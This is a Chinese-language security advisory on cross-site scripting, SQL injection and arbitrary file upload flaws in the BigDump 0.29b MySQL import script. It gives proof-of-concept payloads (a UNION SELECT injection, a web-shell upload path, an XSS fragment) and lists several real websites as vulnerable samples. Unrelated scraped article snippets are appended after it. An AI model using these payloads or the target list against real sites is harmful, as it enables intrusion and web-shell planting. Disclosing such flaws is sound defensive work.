任意文件上传mysql_BigDump 跨站脚本、SQL注入、任意文件上传漏洞
发布日期:2012-11-28
更新日期:2012-12-04
受影响系统:
ozerov BigDump 0.29b
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 56744
BigDump 是由德国人Alexey Ozerov 用PHP语言开发的一个工具脚本,用来导入批量mysql数据。
BigDump 0.29b、0.32b及其他版本在实现上存在跨站脚本、SQL注入、任意文件上传漏洞,利用这些漏洞攻击者可窃取Cookie身份验证凭证、上传任意文件、访问或修改数据、利用下层数据库内的其他漏洞。
链接:http://packetstormsecurity.org/files/118463/bigdump032b-shellxsssql.txt
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://www.example.com/bigdump.php?start= [SQL]
http://www.example.com/bigdump.php?start= [XSS]
http://www.example.com/bigdump.php [File Upload]
# Expl0it/P0c ###################
http://site.com/bigdump.php?start= < Sql Vulnerability Path >
http://site.com/bigdump.php?start= < Xss Vulnerability Path >
http://site.com/bigdump.php < Arbitrary Upload Path >
# Expl0it/P0c/upload ###############
Input $ch = curl_init("http://site.com/bigdump.php?start=shell.php")
Output $ch = curl_init("http://site.com/bigdump/uploads/shell.php")
# Expl0it/P0c/Sql ###################
+union+select+1,2,3,4,5,6,7,8,9,10--+
# Expl0it/P0c/Xss ###################
">
# Vulnerability/C0de/###################
?action=step3" enctype="multipart/form-data">
Dump file:
# Samples/Arbitrart_Upload/Sql/Xss ####################
http://www.fs7a.net/vb/1/bigdump.php
http://www.lis186.com/dump/bigdump.php
http://bigw3.com/bigdump.php
http://twin.skr.jp/bigdump/bigdump.php
http://www.fs7a.net/vb/1/bigdump.php?start=%
http://www.lis186.com/dump/bigdump.php?start=%
http://bigw3.com/bigdump.php?start=%
http://twin.skr.jp/bigdump/bigdump.php?start=%
建议:
--------------------------------------------------------------------------------
厂商补丁:
ozerov
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
任意文件上传mysql_BigDump 跨站脚本、SQL注入、任意文件上传漏洞相关推荐
- CTF学习(二)——信息泄露、密码口令、SQL注入、文件上传
一.信息泄露 1.1目录遍历 ①点开题目后依次点开各目录,遍历后发现flag文件得旗 1.2 PHPINFO ①在长篇文件中查找flag得旗 1.3备份文件下载 1.3.1 网站源码 ①由提示下载文件 ...
- 本地搭建靶站进行漏洞复现和防御(SQL注入、文件上传、XSS漏洞的多种形式)
目录 注册登录模块 源码 测试 源码加固 文件上传模块 源码 测试 源码加固 发布动态模块 源码 测试 源码加固 本地搭建靶站进行测试,旨在提高自己的开发能力以及对漏洞的理解. 源码:利用PHP开发具 ...
- web漏洞(CSRF-SSRF-文件包含-文件解释-文件下载-目录遍历-sql注入-文件上传-反序列化-XSS-XXE-RCE-逻辑越权)
1.CSRF(跨站请求伪造)(需要对方是在登录的情况下)--主要用于骗转账等等 原理:A在已经登录了银行的网站,并且此时去访问了B所构造的网页添加了特殊代码,A点击了B,由于A已经登录了,就造成了A直 ...
- ecshop 2.x/3.x sql注入/任意代码执行漏洞
影响版本: Ecshop 2.x Ecshop 3.x-3.6.0 漏洞分析: 该漏洞影响ECShop 2.x和3.x版本,是一个典型的"二次漏洞",通过user.php文件中di ...
- pythom打包文件太大_从SQL注入到整站打包与本地搭建
一.前言 如题,由于是在已知有一处sql注入的情况下才接手进行的后续操作,因此前面信息搜集则一笔带过. 二.信息搜集 目标是个本地的传销站点其大致信息为IIS+ASP.NET+安全狗.腾讯云. 三.B ...
- SQL防注入大全——史上最全的 SQL 注入资料
什么是 SQL 注入速查表? SQL注入速查表是可以为你提供关于不同种类 SQL注入漏洞 的详细信息的一个资源.这份速查表对于经验丰富的渗透测试人员,或者刚开始接触 Web应用安全 的初学者,都是一份 ...
- 软件安全实验——lab8(SQL注入)(上)(旧虚拟机seedubuntu9版本实验)
目录标题 2.实验室环境 2.1环境配置 2.2关闭对策 3.实验室的任务 3.1 Task 1(30分):针对SELECT语句的SQL注入攻击 3.2 Task 2(30分): SQL注入的UPDA ...
- sql注入php文件包含,phpshe v1.1多处SQL注入文件包含漏洞
时间:2013-04-22来源:源码库 作者:源码库 文章热度: ℃ 发布日期:2013-04.16 发布作者:Kn1f3 漏洞类型:SQL注入 漏洞描述: 0×00 整体大概参数传输 //commo ...
- SQL 注入读写文件
1. SQL 注入读取/etc/passwd 文件 在 MySQL 中读取文件,使用 load_file("文件路径/名称") MariaDB [security]> sel ...
最新文章
- 57 Node.js异步编程
- 反向非归零编码_【基础】什么是编码器?
- 用java建立多项式logit模型_使用mgcv向多项式logit模型添加样条
- 使用c# .net core开发国标gb28181 sip +流媒体服务完成视频监控实例教程 亲身完美体验过程...
- 【渝粤教育】国家开放大学2018年秋季 2247T社会工作政策法规 参考试题
- asp.net(C#)写SQL语句技巧
- python基础--局部变量与全局变量
- es xxx_by_query
- u8转完看不到菜单_填制凭证界面上的菜单看不见
- php定位符,行定位符、单词定界符实例用法(正则表达式字符集1)
- Atitit 技术体系路线图与金字塔模型 前端技术层次金字塔 目录 1. 原理core 框架层 》》 模块 项目层 1 1.1. 技术原理层 1 1.2. 框架层 1 1.3. 模块 1 2.
- txt简谱制作器上线(个人java程序)
- 教育网系统服务器域名地址,教育网宽带dns服务器IP地址(2021年更新)
- java已知两坐标求直线长度_java计算两点间的距离方法总结
- WCDMA 基本信令流程
- 传奇怎么设置沙巴克自动攻城
- cl.ez6.xyz index.php,[BJDCTF2020]EzPHP-POP链
- Zemax光学设计(十二) —— 激光扫描物镜设计
- 5G网络优化.PPT
- linux系统du指令,linux的du命令